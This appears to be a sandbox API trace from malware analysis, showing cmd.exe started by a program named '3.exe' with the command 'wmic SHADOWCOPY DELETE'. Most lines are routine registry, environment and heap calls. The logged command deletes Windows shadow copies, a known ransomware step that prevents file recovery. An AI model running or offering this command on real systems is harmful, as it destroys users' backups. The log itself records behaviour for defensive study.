	[0033.736] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf780, dwLength=0x30 | out: lpBuffer=0x1cf780*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.736] GetConsoleOutputCP () returned 0x1b5
	[0033.736] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0033.737] SetConsoleCtrlHandler (HandlerRoutine=0x4a3d3184, Add=1) returned 1
	[0033.737] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.737] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0033.737] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.737] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3de194 | out: lpMode=0x4a3de194) returned 1
	[0033.737] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.737] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0033.738] _get_osfhandle (_FileHandle=0) returned 0x3
	[0033.738] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3de198 | out: lpMode=0x4a3de198) returned 1
	[0033.738] GetEnvironmentStringsW () returned 0x348a60*
	[0033.738] GetProcessHeap () returned 0x330000
	[0033.738] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xa7c) returned 0x3494f0
	[0033.738] FreeEnvironmentStringsW (penv=0x348a60) returned 1
	[0033.738] GetProcessHeap () returned 0x330000
	[0033.738] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x8) returned 0x3488e0
	[0033.738] GetEnvironmentStringsW () returned 0x348a60*
	[0033.738] GetProcessHeap () returned 0x330000
	[0033.738] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xa7c) returned 0x349f80
	[0033.738] FreeEnvironmentStringsW (penv=0x348a60) returned 1
	[0033.738] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6d8 | out: phkResult=0x1ce6d8*=0x44) returned 0x0
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x0, lpData=0x1ce6f0*=0x18, lpcbData=0x1ce6d4*=0x1000) returned 0x2
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x4, lpData=0x1ce6f0*=0x1, lpcbData=0x1ce6d4*=0x4) returned 0x0
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x0, lpData=0x1ce6f0*=0x1, lpcbData=0x1ce6d4*=0x1000) returned 0x2
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x4, lpData=0x1ce6f0*=0x0, lpcbData=0x1ce6d4*=0x4) returned 0x0
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x4, lpData=0x1ce6f0*=0x40, lpcbData=0x1ce6d4*=0x4) returned 0x0
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x4, lpData=0x1ce6f0*=0x40, lpcbData=0x1ce6d4*=0x4) returned 0x0
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x0, lpData=0x1ce6f0*=0x40, lpcbData=0x1ce6d4*=0x1000) returned 0x2
	[0033.739] RegCloseKey (hKey=0x44) returned 0x0
	[0033.739] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6d8 | out: phkResult=0x1ce6d8*=0x44) returned 0x0
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x0, lpData=0x1ce6f0*=0x40, lpcbData=0x1ce6d4*=0x1000) returned 0x2
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x4, lpData=0x1ce6f0*=0x1, lpcbData=0x1ce6d4*=0x4) returned 0x0
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x0, lpData=0x1ce6f0*=0x1, lpcbData=0x1ce6d4*=0x1000) returned 0x2
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x4, lpData=0x1ce6f0*=0x0, lpcbData=0x1ce6d4*=0x4) returned 0x0
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x4, lpData=0x1ce6f0*=0x9, lpcbData=0x1ce6d4*=0x4) returned 0x0
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x4, lpData=0x1ce6f0*=0x9, lpcbData=0x1ce6d4*=0x4) returned 0x0
	[0033.739] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6d0, lpData=0x1ce6f0, lpcbData=0x1ce6d4*=0x1000 | out: lpType=0x1ce6d0*=0x0, lpData=0x1ce6f0*=0x9, lpcbData=0x1ce6d4*=0x1000) returned 0x2
	[0033.739] RegCloseKey (hKey=0x44) returned 0x0
	[0033.739] time (in: timer=0x0 | out: timer=0x0) returned 0x5dc417d1
	[0033.739] srand (_Seed=0x5dc417d1) 
	[0033.739] GetCommandLineW () returned="/C wmic SHADOWCOPY DELETE"
	[0033.739] GetCommandLineW () returned="/C wmic SHADOWCOPY DELETE"
	[0033.740] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.740] GetProcessHeap () returned 0x330000
	[0033.740] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x218) returned 0x34aa10
	[0033.740] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x34aa20, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0033.740] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0033.740] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0033.740] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0033.740] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0033.740] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0033.740] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0033.740] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0033.740] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0033.740] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0033.740] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0033.740] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0033.740] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0033.740] GetProcessHeap () returned 0x330000
	[0033.740] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x3494f0 | out: hHeap=0x330000) returned 1
	[0033.740] GetEnvironmentStringsW () returned 0x348a60*
	[0033.740] GetProcessHeap () returned 0x330000
	[0033.740] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xa94) returned 0x34ac30
	[0033.741] FreeEnvironmentStringsW (penv=0x348a60) returned 1
	[0033.741] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0033.741] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0033.741] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0033.741] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0033.741] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0033.741] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0033.741] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0033.741] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0033.741] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0033.741] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0033.741] GetProcessHeap () returned 0x330000
	[0033.741] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x5c) returned 0x34b6d0
	[0033.741] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf4e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.741] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf4e0, lpFilePart=0x1cf4c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf4c0*="Desktop") returned 0x25
	[0033.741] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0033.741] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf1f0 | out: lpFindFileData=0x1cf1f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x34b740
	[0033.741] FindClose (in: hFindFile=0x34b740 | out: hFindFile=0x34b740) returned 1
	[0033.741] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1cf1f0 | out: lpFindFileData=0x1cf1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x34b740
	[0033.741] FindClose (in: hFindFile=0x34b740 | out: hFindFile=0x34b740) returned 1
	[0033.741] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20
	[0033.741] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1cf1f0 | out: lpFindFileData=0x1cf1f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb9670240, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb9670240, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x34b740
	[0033.742] FindClose (in: hFindFile=0x34b740 | out: hFindFile=0x34b740) returned 1
	[0033.742] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0033.742] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1
	[0033.742] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1
	[0033.742] GetProcessHeap () returned 0x330000
	[0033.742] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34ac30 | out: hHeap=0x330000) returned 1
	[0033.742] GetEnvironmentStringsW () returned 0x34b740*
	[0033.742] GetProcessHeap () returned 0x330000
	[0033.742] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xae8) returned 0x34c230
	[0033.742] FreeEnvironmentStringsW (penv=0x34b740) returned 1
	[0033.742] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.742] GetProcessHeap () returned 0x330000
	[0033.742] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34b6d0 | out: hHeap=0x330000) returned 1
	[0033.742] GetProcessHeap () returned 0x330000
	[0033.742] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4016) returned 0x34cd20
	[0033.743] GetProcessHeap () returned 0x330000
	[0033.743] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x42) returned 0x349550
	[0033.743] GetProcessHeap () returned 0x330000
	[0033.743] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34cd20 | out: hHeap=0x330000) returned 1
	[0033.743] GetConsoleOutputCP () returned 0x1b5
	[0033.743] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0033.743] GetUserDefaultLCID () returned 0x409
	[0033.743] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a3e7b50, cchData=8 | out: lpLCData=":") returned 2
	[0033.743] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf5f0, cchData=128 | out: lpLCData="0") returned 2
	[0033.743] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf5f0, cchData=128 | out: lpLCData="0") returned 2
	[0033.743] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf5f0, cchData=128 | out: lpLCData="1") returned 2
	[0033.743] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a3fa740, cchData=8 | out: lpLCData="/") returned 2
	[0033.743] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a3fa4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0033.744] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a3fa460, cchData=32 | out: lpLCData="Tue") returned 4
	[0033.744] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a3fa420, cchData=32 | out: lpLCData="Wed") returned 4
	[0033.744] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a3fa3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0033.744] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a3fa3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0033.744] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a3fa360, cchData=32 | out: lpLCData="Sat") returned 4
	[0033.744] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a3fa700, cchData=32 | out: lpLCData="Sun") returned 4
	[0033.744] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a3e7b40, cchData=8 | out: lpLCData=".") returned 2
	[0033.744] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a3fa4e0, cchData=8 | out: lpLCData=",") returned 2
	[0033.744] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0033.745] GetProcessHeap () returned 0x330000
	[0033.745] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x20c) returned 0x349610
	[0033.745] GetConsoleTitleW (in: lpConsoleTitle=0x349610, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.745] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0033.745] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0
	[0033.745] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290
	[0033.745] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0
	[0033.745] GetProcessHeap () returned 0x330000
	[0033.745] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4012) returned 0x34cd20
	[0033.745] GetProcessHeap () returned 0x330000
	[0033.745] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34cd20 | out: hHeap=0x330000) returned 1
	[0033.746] _wcsicmp (_String1="wmic", _String2=")") returned 78
	[0033.746] _wcsicmp (_String1="FOR", _String2="wmic") returned -17
	[0033.746] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17
	[0033.746] _wcsicmp (_String1="IF", _String2="wmic") returned -14
	[0033.746] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14
	[0033.746] _wcsicmp (_String1="REM", _String2="wmic") returned -5
	[0033.746] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5
	[0033.746] GetProcessHeap () returned 0x330000
	[0033.746] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb0) returned 0x349830
	[0033.746] GetProcessHeap () returned 0x330000
	[0033.746] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x1a) returned 0x3445e0
	[0033.746] GetProcessHeap () returned 0x330000
	[0033.746] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x36) returned 0x3464d0
	[0033.747] GetConsoleTitleW (in: lpConsoleTitle=0x1cf500, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.747] _wcsicmp (_String1="wmic", _String2="DIR") returned 19
	[0033.747] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18
	[0033.747] _wcsicmp (_String1="wmic", _String2="DEL") returned 19
	[0033.747] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3
	[0033.747] _wcsicmp (_String1="wmic", _String2="COPY") returned 20
	[0033.747] _wcsicmp (_String1="wmic", _String2="CD") returned 20
	[0033.747] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20
	[0033.747] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5
	[0033.748] _wcsicmp (_String1="wmic", _String2="REN") returned 5
	[0033.748] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18
	[0033.748] _wcsicmp (_String1="wmic", _String2="SET") returned 4
	[0033.748] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7
	[0033.748] _wcsicmp (_String1="wmic", _String2="DATE") returned 19
	[0033.748] _wcsicmp (_String1="wmic", _String2="TIME") returned 3
	[0033.748] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7
	[0033.748] _wcsicmp (_String1="wmic", _String2="MD") returned 10
	[0033.748] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10
	[0033.748] _wcsicmp (_String1="wmic", _String2="RD") returned 5
	[0033.748] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5
	[0033.748] _wcsicmp (_String1="wmic", _String2="PATH") returned 7
	[0033.748] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16
	[0033.748] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4
	[0033.748] _wcsicmp (_String1="wmic", _String2="CLS") returned 20
	[0033.748] _wcsicmp (_String1="wmic", _String2="CALL") returned 20
	[0033.748] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1
	[0033.748] _wcsicmp (_String1="wmic", _String2="VER") returned 1
	[0033.748] _wcsicmp (_String1="wmic", _String2="VOL") returned 1
	[0033.748] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18
	[0033.748] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4
	[0033.748] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18
	[0033.748] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3
	[0033.748] _wcsicmp (_String1="wmic", _String2="START") returned 4
	[0033.748] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19
	[0033.748] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12
	[0033.748] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10
	[0033.748] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7
	[0033.748] _wcsicmp (_String1="wmic", _String2="POPD") returned 7
	[0033.748] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22
	[0033.748] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17
	[0033.748] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21
	[0033.748] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20
	[0033.748] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10
	[0033.748] _wcsicmp (_String1="wmic", _String2="DIR") returned 19
	[0033.748] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18
	[0033.748] _wcsicmp (_String1="wmic", _String2="DEL") returned 19
	[0033.748] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3
	[0033.748] _wcsicmp (_String1="wmic", _String2="COPY") returned 20
	[0033.749] _wcsicmp (_String1="wmic", _String2="CD") returned 20
	[0033.749] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20
	[0033.749] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5
	[0033.749] _wcsicmp (_String1="wmic", _String2="REN") returned 5
	[0033.749] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18
	[0033.749] _wcsicmp (_String1="wmic", _String2="SET") returned 4
	[0033.749] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7
	[0033.749] _wcsicmp (_String1="wmic", _String2="DATE") returned 19
	[0033.749] _wcsicmp (_String1="wmic", _String2="TIME") returned 3
	[0033.749] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7
	[0033.749] _wcsicmp (_String1="wmic", _String2="MD") returned 10
	[0033.749] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10
	[0033.749] _wcsicmp (_String1="wmic", _String2="RD") returned 5
	[0033.749] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5
	[0033.749] _wcsicmp (_String1="wmic", _String2="PATH") returned 7
	[0033.749] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16
	[0033.749] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4
	[0033.749] _wcsicmp (_String1="wmic", _String2="CLS") returned 20
	[0033.749] _wcsicmp (_String1="wmic", _String2="CALL") returned 20
	[0033.749] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1
	[0033.749] _wcsicmp (_String1="wmic", _String2="VER") returned 1
	[0033.749] _wcsicmp (_String1="wmic", _String2="VOL") returned 1
	[0033.749] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18
	[0033.749] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4
	[0033.749] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18
	[0033.749] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3
	[0033.749] _wcsicmp (_String1="wmic", _String2="START") returned 4
	[0033.749] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19
	[0033.749] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12
	[0033.749] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10
	[0033.749] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7
	[0033.749] _wcsicmp (_String1="wmic", _String2="POPD") returned 7
	[0033.749] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22
	[0033.749] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17
	[0033.749] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21
	[0033.749] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20
	[0033.749] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10
	[0033.749] _wcsicmp (_String1="wmic", _String2="FOR") returned 17
	[0033.750] _wcsicmp (_String1="wmic", _String2="IF") returned 14
	[0033.750] _wcsicmp (_String1="wmic", _String2="REM") returned 5
	[0033.750] GetProcessHeap () returned 0x330000
	[0033.750] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x218) returned 0x3498f0
	[0033.750] GetProcessHeap () returned 0x330000
	[0033.750] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x40) returned 0x34ac60
	[0033.750] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20
	[0033.750] GetProcessHeap () returned 0x330000
	[0033.750] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x420) returned 0x349b10
	[0033.750] SetErrorMode (uMode=0x0) returned 0x0
	[0033.750] SetErrorMode (uMode=0x1) returned 0x0
	[0033.750] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x349b20, lpFilePart=0x1ced90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ced90*="Desktop") returned 0x25
	[0033.750] SetErrorMode (uMode=0x0) returned 0x1
	[0033.750] GetProcessHeap () returned 0x330000
	[0033.750] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x349b10, Size=0x66) returned 0x349b10
	[0033.750] GetProcessHeap () returned 0x330000
	[0033.750] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x349b10) returned 0x66
	[0033.750] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0033.751] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0033.751] GetProcessHeap () returned 0x330000
	[0033.751] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x128) returned 0x349b90
	[0033.751] GetProcessHeap () returned 0x330000
	[0033.751] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x240) returned 0x349cc0
	[0033.757] GetProcessHeap () returned 0x330000
	[0033.757] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x349cc0, Size=0x12a) returned 0x349cc0
	[0033.757] GetProcessHeap () returned 0x330000
	[0033.757] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x349cc0) returned 0x12a
